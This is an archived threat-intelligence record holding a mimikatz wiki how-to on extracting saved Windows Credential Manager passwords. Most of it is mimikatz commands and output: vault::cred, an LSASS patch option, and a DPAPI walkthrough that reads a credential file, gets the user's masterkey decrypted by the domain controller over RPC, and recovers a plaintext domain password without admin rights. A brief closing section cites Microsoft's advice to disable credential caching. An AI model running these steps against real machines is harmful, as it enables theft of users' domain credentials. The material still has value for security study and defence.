{
	"id": "b6097d7b-d01d-439a-b8b3-6a74755f942d",
	"created_at": "2026-04-06T00:16:14.632275Z",
	"updated_at": "2026-04-10T03:21:43.869396Z",
	"deleted_at": null,
	"sha1_hash": "fa7f21fa5027b540d159ff24eabc2b80d3511ce7",
	"title": "howto ~ credential manager saved credentials",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 107984,
	"plain_text": "howto ~ credential manager saved credentials\r\nBy gentilkiwi\r\nArchived: 2026-04-05 16:22:01 UTC\r\nThere are somes ways to get savec credentials from the Credential Manager\r\nThe normal, the standard, the usual way...\r\nWith mimikatz it's easy as: vault::cred\r\nmimikatz # vault::cred\r\nTargetName : genaddr / \u003cNULL\u003e\r\nUserName : genuser\r\nComment : \u003cNULL\u003e\r\nType : 1 - generic\r\nPersist : 3 - enterprise\r\nFlags : 00000000\r\nCredential : genpass\r\nAttributes : 0\r\nTargetName : domsrv / \u003cNULL\u003e\r\nUserName : domusr\r\nComment : \u003cNULL\u003e\r\nType : 2 - domain_password\r\nPersist : 3 - enterprise\r\nFlags : 00000000\r\nCredential :\r\nAttributes : 0\r\nTargetName : LegacyGeneric:target=genaddr / \u003cNULL\u003e\r\nUserName : genuser\r\nComment : \u003cNULL\u003e\r\nType : 1 - generic\r\nPersist : 3 - enterprise\r\nFlags : 00000000\r\nCredential : genpass\r\nAttributes : 0\r\nTargetName : Domain:target=domsrv / \u003cNULL\u003e\r\nUserName : domusr\r\nComment : \u003cNULL\u003e\r\nType : 2 - domain_password\r\nPersist : 3 - enterprise\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nPage 1 of 7\n\nFlags : 00000000\r\nCredential :\r\nAttributes : 0\r\nNo magic behind: it uses the standard API CredEnumerate , with Flags at 0 then\r\nCRED_ENUMERATE_ALL_CREDENTIALS to try to get them all.\r\nMixed with: vault::list , it's enough to get a lots of credentials for the current user (especially Web stuff).\r\nProblem\r\nCredentialBlob\r\nblob\r\nSecret data for the credential. The CredentialBlob member can be both read and written.\r\nIf the Type member is CRED_TYPE_DOMAIN_PASSWORD , this member contains the plaintext Unicode\r\npassword for UserName. The CredentialBlob and CredentialBlobSize members do not include a\r\ntrailing zero character. Also, for CRED_TYPE_DOMAIN_PASSWORD , this member can only be read by the\r\nauthentication packages.\r\nhttp://msdn.microsoft.com/library/windows/desktop/aa374788.aspx\r\nWorkaround\r\nSo, if we want access to network shares saved credentials, RDP passwords, etc., we need to be admin to alter\r\nLSASS in order to:\r\npatch its logic (prevent LSASS to check if type is CRED_TYPE_DOMAIN_PASSWORD ) - this is the current\r\nbehavior of the /patch argument.\r\ninject a thread or a module in LSASS to be seen as an authentication packages\r\nDanger\r\nhigh voltage\r\ndanger\r\nThis operation will alter LSASS and is NOT recommended, especially when you can use the DPAPI method.\r\nDPAPI (all the things)\r\na basic introduction on DPAPI stuff is here: module ~ dpapi\r\nLike exposed in https://1drv.ms/x/s!AlQCT5PF61KjmCAhhYO0flOcZE4e, credentials are stored in user's profile.\r\nUsually in:\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nPage 2 of 7\n\n%appdata%\\Microsoft\\Credentials\r\n%localappdata%\\Microsoft\\Credentials\r\nLet's take a look\r\nAsking dpapi module, cred function of mimikatz , you can view the \"content\" of a credential file.\r\nmimikatz # dpapi::cred /in:\"%appdata%\\Microsoft\\Credentials\\85E671988F9A2D1981A4B6791F9A4EE8\"\r\n**BLOB**\r\n dwVersion : 00000001 - 1\r\n guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n dwMasterKeyVersion : 00000001 - 1\r\n guidMasterKey : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}\r\n dwFlags : 20000000 - 536870912 (system ; )\r\n dwDescriptionLen : 00000050 - 80\r\n szDescription : Données d’identification d’entreprise\r\n algCrypt : 00006603 - 26115 (CALG_3DES)\r\n dwAlgCryptLen : 000000c0 - 192\r\n dwSaltLen : 00000010 - 16\r\n pbSalt : 024e83a1b7c1412251dd2718126fca84\r\n dwHmacKeyLen : 00000000 - 0\r\n pbHmackKey :\r\n algHash : 00008004 - 32772 (CALG_SHA1)\r\n dwAlgHashLen : 000000a0 - 160\r\n dwHmac2KeyLen : 00000010 - 16\r\n pbHmack2Key : e2bbe3a6e2fe7120ad9000afc3aa5ec2\r\n dwDataLen : 00000090 - 144\r\n pbData : 9ee6d5c1385baac832fdd3ed1fb21719fc643806df27deb30a0f0b80bfe6258fbd86dc4dfe920b8ad39653b0f\r\n dwSignLen : 00000014 - 20\r\n pbSign : d0f3cb42d4f7aa0253a9229c6da5c6697448887f\r\nWhat is interesting here:\r\ndwFlags : 20000000 - 536870912 (system ; ) this is the \"bad\" new... the DPAPI protected the blob\r\nwith the CRYPTPROTECT_SYSTEM flag, preventing an unprivilegied process to decrypt the blob... (~= not\r\nyou, only LSASS )\r\nguidMasterKey : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2} this is the GUID of the masterkey needed\r\nto decrypt the blob. LSASS has it in its cache, or will be able to load it on the fly when needed...\r\nDecrypt\r\nNaive approach\r\nBecause of the system flag (protected by the signature of the blob - we can't alter it), LSASS will refuse to\r\nunprotect the blob for us...\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nPage 3 of 7\n\nDecrypting Credential:\r\n * using CryptUnprotectData API\r\nERROR kuhl_m_dpapi_unprotect_raw_or_blob ; CryptUnprotectData (0x0000000d)\r\ndeeper\r\nThe masterkey\r\nHere, thanks to the previous GUID we know that the masterkey is located in: %appdata%\\Microsoft\\Protect\\\r\n\u003cusersid\u003e\\cc6eb538-28f1-4ab4-adf2-f5594e88f0b2\r\nmimikatz # dpapi::masterkey /in:\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1719172562-3308538836-3929312420-1104\\cc6\r\n**MASTERKEYS**\r\n dwVersion : 00000002 - 2\r\n szGuid : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}\r\n dwFlags : 00000000 - 0\r\n dwMasterKeyLen : 00000088 - 136\r\n dwBackupKeyLen : 00000068 - 104\r\n dwCredHistLen : 00000000 - 0\r\n dwDomainKeyLen : 00000174 - 372\r\n[masterkey]\r\n **MASTERKEY**\r\n dwVersion : 00000002 - 2\r\n salt : 704f7ca8be647c20dc36e8ae4127966b\r\n rounds : 00004650 - 18000\r\n algHash : 00008009 - 32777 (CALG_HMAC)\r\n algCrypt : 00006603 - 26115 (CALG_3DES)\r\n pbKey : 1277546c39d446616022d57823d8337b20b89ef8077dd68acdf65a38ef60310ab66175eeb766a39d66cdc0cb7\r\n[backupkey]\r\n **MASTERKEY**\r\n dwVersion : 00000002 - 2\r\n salt : 3afaf040c982786cfa36342d8005a16f\r\n rounds : 00004650 - 18000\r\n algHash : 00008009 - 32777 (CALG_HMAC)\r\n algCrypt : 00006603 - 26115 (CALG_3DES)\r\n pbKey : d9c4e107b6eda306d7b4bf09a23693165d2faa6d52f509c0c4a8cbf08950919024176739d11d82d1e4e6f1659\r\n[domainkey]\r\n **DOMAINKEY**\r\n dwVersion : 00000002 - 2\r\n dwSecretLen : 00000100 - 256\r\n dwAccesscheckLen : 00000058 - 88\r\n guidMasterKey : {9c71e914-1ed5-4338-8461-4dcc363553be}\r\n pbSecret : dd39d20bd5ea9b9b677c1ada3da052cc240476185020337a96df497bd9b46dbf499d5c02d341721d55d3087ac\r\n pbAccesscheck : 2c5332354ab0bf2ec0fdb17489661e8785532feb72fc491c978cec342f714665e570904642434cc3852ef18cd\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nPage 4 of 7\n\nAuto SID from path seems to be: S-1-5-21-1719172562-3308538836-3929312420-1104\r\nIf you are a domain admin, the domainkey part can be very interesting... but here, we consider you are\r\nonly the current user...\r\nIf you know the user password, you can easily decrypt the masterkey with it.\r\nSo, no solution ? Here, few questions to ask yourself:\r\n1. how do you deal with smartcard users without NTLM transmitted?\r\n2. do hippos think rhinos are unicorns?\r\n3. does a domain user who forgets his logon password lose its saved data?\r\nRPC\r\nIn domain, a domain controller runs a RPC Service to deal with encrypted masterkeys for users, MS-BKRP\r\nhttps://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-BKRP/[MS-BKRP].pdf\r\nhttps://twitter.com/gentilkiwi/statuses/746493452582526976\r\nThis service handles the RSA private key associated with all masterkeys of the domain, and is in charge to\r\nprovided decryption to authorized users (the danger around this never changed RSA private key is another story,\r\nwe're not admin here ;) - https://twitter.com/gentilkiwi/statuses/609890409830064129 ,\r\nhttps://twitter.com/gentilkiwi/statuses/604408115090591744 )\r\nAs this cc6eb538-28f1-4ab4-adf2-f5594e88f0b2 master key belongs to the current user, we can certainly use it\r\nwith the /rpc argument:\r\nmimikatz # dpapi::masterkey /in:\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1719172562-3308538836-3929312420-1104\\cc6\r\n**MASTERKEYS**\r\n dwVersion : 00000002 - 2\r\n szGuid : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}\r\n[...]\r\n[domainkey] with RPC\r\n[DC] 'lab.local' will be the domain\r\n[DC] 'dc.lab.local' will be the DC server\r\n key : 3ed054e284b5d47796f4779a2c0de63ca0ea9c63ce9e3f6868e2dd4f1113f6f3c55d9c1e21d2378c4499f98c0682991647dfd5f6\r\n sha1: 81c99543dea591c11f20d69027ea2016d89d07dd\r\nSo sweet ! the domain controller has decrypted it for us, and mimikatz has placed it in its cache:\r\nmimikatz # dpapi::cache\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nPage 5 of 7\n\nCREDENTIALS cache\r\n=================\r\nMASTERKEYS cache\r\n================\r\nGUID:{cc6eb538-28f1-4ab4-adf2-f5594e88f0b2};KeyHash:81c99543dea591c11f20d69027ea2016d89d07dd\r\nDOMAINKEYS cache\r\n================\r\nWith the key in the mimikatz cache, we can display a last time the credential file:\r\nmimikatz # dpapi::cred /in:\"%appdata%\\Microsoft\\Credentials\\85E671988F9A2D1981A4B6791F9A4EE8\"\r\n**BLOB**\r\n dwVersion : 00000001 - 1\r\n guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n dwMasterKeyVersion : 00000001 - 1\r\n guidMasterKey : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}\r\n dwFlags : 20000000 - 536870912 (system ; )\r\n dwDescriptionLen : 00000050 - 80\r\n szDescription : Données d’identification d’entreprise\r\n algCrypt : 00006603 - 26115 (CALG_3DES)\r\n dwAlgCryptLen : 000000c0 - 192\r\n dwSaltLen : 00000010 - 16\r\n pbSalt : 024e83a1b7c1412251dd2718126fca84\r\n dwHmacKeyLen : 00000000 - 0\r\n pbHmackKey :\r\n algHash : 00008004 - 32772 (CALG_SHA1)\r\n dwAlgHashLen : 000000a0 - 160\r\n dwHmac2KeyLen : 00000010 - 16\r\n pbHmack2Key : e2bbe3a6e2fe7120ad9000afc3aa5ec2\r\n dwDataLen : 00000090 - 144\r\n pbData : 9ee6d5c1385baac832fdd3ed1fb21719fc643806df27deb30a0f0b80bfe6258fbd86dc4dfe920b8ad39653b0f\r\n dwSignLen : 00000014 - 20\r\n pbSign : d0f3cb42d4f7aa0253a9229c6da5c6697448887f\r\nDecrypting Credential:\r\n * volatile cache: GUID:{cc6eb538-28f1-4ab4-adf2-f5594e88f0b2};KeyHash:81c99543dea591c11f20d69027ea2016d89d07dd\r\n**CREDENTIAL**\r\n credFlags : 00000030 - 48\r\n credSize : 0000008e - 142\r\n credUnk0 : 00000000 - 0\r\n Type : 00000002 - 2 - domain_password\r\n Flags : 00000000 - 0\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nPage 6 of 7\n\nLastWritten : 11/12/2017 19:58:36\r\n unkFlagsOrSize : 00000010 - 16\r\n Persist : 00000003 - 3 - enterprise\r\n AttributeCount : 00000000 - 0\r\n unk0 : 00000000 - 0\r\n unk1 : 00000000 - 0\r\n TargetName : Domain:target=domsrv\r\n UnkData : (null)\r\n Comment : (null)\r\n TargetAlias : (null)\r\n UserName : domusr\r\n CredentialBlob : dompass\r\n Attributes : 0\r\nGood, we now have credentials:\r\nServer: domsrv\r\nUserName: domusr\r\nPassword: dompass\r\nWithout any particular rights.\r\ngood\r\nWhat you can do?\r\nNearly nothing... the ability to decrypt its own masterkeys by RPC is by protocol/design... and is needed when\r\nusing smartcard or when loosing passwords.\r\nBut, storing domain credentials in the credential manager is a bad practice... even Microsoft recommend to disable\r\nit... (but in the name of legacy, will enable it by default)\r\nBest practices\r\nIt is a recommended practice to disable the ability of the Windows operating system to cache credentials\r\non any computer where credentials are not needed. Evaluate your servers and workstations to determine\r\nthe requirements. Cached credentials are designed primarily to be used on laptops that require domain\r\ncredentials when disconnected from the domain.\r\nOriginal text and GPO to disable this kind of sensitive storage:\r\nhttps://technet.microsoft.com/library/jj852185.aspx\r\nSource: https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials"
	],
	"report_names": [
		"howto-~-credential-manager-saved-credentials"
	],
	"threat_actors": [],
	"ts_created_at": 1775434574,
	"ts_updated_at": 1775791303,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa7f21fa5027b540d159ff24eabc2b80d3511ce7.pdf",
		"text": "https://archive.orkl.eu/fa7f21fa5027b540d159ff24eabc2b80d3511ce7.txt",
		"img": "https://archive.orkl.eu/fa7f21fa5027b540d159ff24eabc2b80d3511ce7.jpg"
	}
}